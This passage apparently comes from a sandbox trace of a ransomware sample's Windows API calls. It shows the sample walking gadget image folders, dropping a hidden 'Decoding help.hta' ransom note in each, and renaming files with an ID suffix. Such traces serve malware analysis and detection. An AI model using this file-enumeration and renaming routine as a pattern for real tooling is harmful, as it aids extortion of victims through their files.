Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\5.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.311] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba0cf2c4, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba0cf2c4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc08bcabc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="6.png", cAlternateFileName="")) returned 1 [0061.311] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.311] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0061.311] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0061.311] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0061.311] lstrcmpiW (lpString1="Decoding help.hta", lpString2="6.png") returned 1 [0061.311] lstrlenW (lpString="6.png") returned 5 [0061.311] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.311] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0061.311] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="6.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png" [0061.311] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png" [0061.311] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\6.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\6.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\6.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.986] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba0cf2c4, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba0cf2c4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc08e2c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x493b, dwReserved0=0x0, dwReserved1=0x0, cFileName="7.png", cAlternateFileName="")) returned 1 Thread: id = 889 os_tid = 0x1e8 [0055.056] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*", lpFindFileData=0x2c1afd30 | out: lpFindFileData=0x2c1afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x818f91fe, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x818f91fe, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5870 [0056.269] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.269] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x2c1afd30 | out: lpFindFileData=0x2c1afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x818f91fe, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x818f91fe, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.274] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.274] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.274] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x2c1afd30 | out: lpFindFileData=0x2c1afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44cd7dc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb44cd7dc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb44cd7dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6530, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer.png", cAlternateFileName="")) returned 1 [0056.662] lstrcpyW (in: lpString1=0x2ab01088, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0056.662] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0056.662] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0056.662] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0xffffffff [0056.663] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0058.227] WriteFile (in: hFile=0x414, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2c1afcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2c1afcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.228] CloseHandle (hObject=0x414) returned 1 [0058.228] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.228] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer.png") returned 1 [0058.228] lstrlenW (lpString="cronometer.png") returned 14 [0058.228] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0058.228] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0058.228] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png" [0058.228] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png" [0058.228] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.084] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x2c1afd30 | out: lpFindFileData=0x2c1afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c6d6ed, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c6d6ed, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb44f393c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x132, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_dot.png", cAlternateFileName="")) returned 1 [0059.084] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0059.084] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0059.084] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0059.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0059.085] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer_dot.png") returned 1 [0059.085] lstrlenW (lpString="cronometer_dot.png") returned 18 [0059.085] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0059.085] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0059.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer_dot.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png" [0059.085] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png" [0059.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_dot.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_dot.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.428] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x2c1afd30 | out: lpFindFileData=0x2c1afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c2142f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c2142f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb44f393c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_h.png", cAlternateFileName="")) returned 1 [0059.428] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0059.428] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0059.428] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0059.429] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0059.429] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer_h.png") returned 1 [0059.429] lstrlenW (lpString="cronometer_h.png") returned 16 [0059.429] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0059.429] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0059.429] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer_h.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png" [0059.429] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png" [0059.429] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_h.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_h.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.429] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x2c1afd30 | out: lpFindFileData=0x2c1afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c4758e, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c4758e, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4bf19dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_m.png", cAlternateFileName="")) returned 1 [0059.429] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0059.429] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0059.429] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0059.429] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0059.429] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer_m.png") returned 1 [0059.429] lstrlenW (lpString="cronometer_m.png") returned 16 [0059.429] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0059.429] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0059.429] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="cronometer_m.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png" [0059.429] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png" [0059.430] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_m.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_m.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.391] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x2c1afd30 | out: lpFindFileData=0x2c1afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c6d6ed, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb8c6d6ed, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb4e2ce7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="cronometer_s.png", cAlternateFileName="")) returned 1 [0060.391] lstrcpyW (in: lpString1=0x115c1600, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0060.391] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0060.391] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" [0060.391] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\decoding help.hta")) returned 0x1 [0060.391] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cronometer_s.png") returned 1 [0060.391] lstrlenW (lpString="cronometer_s.png") returned 16 [0060.391] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*" [0060.391] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\*.*") returned 74 [0060.391] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows 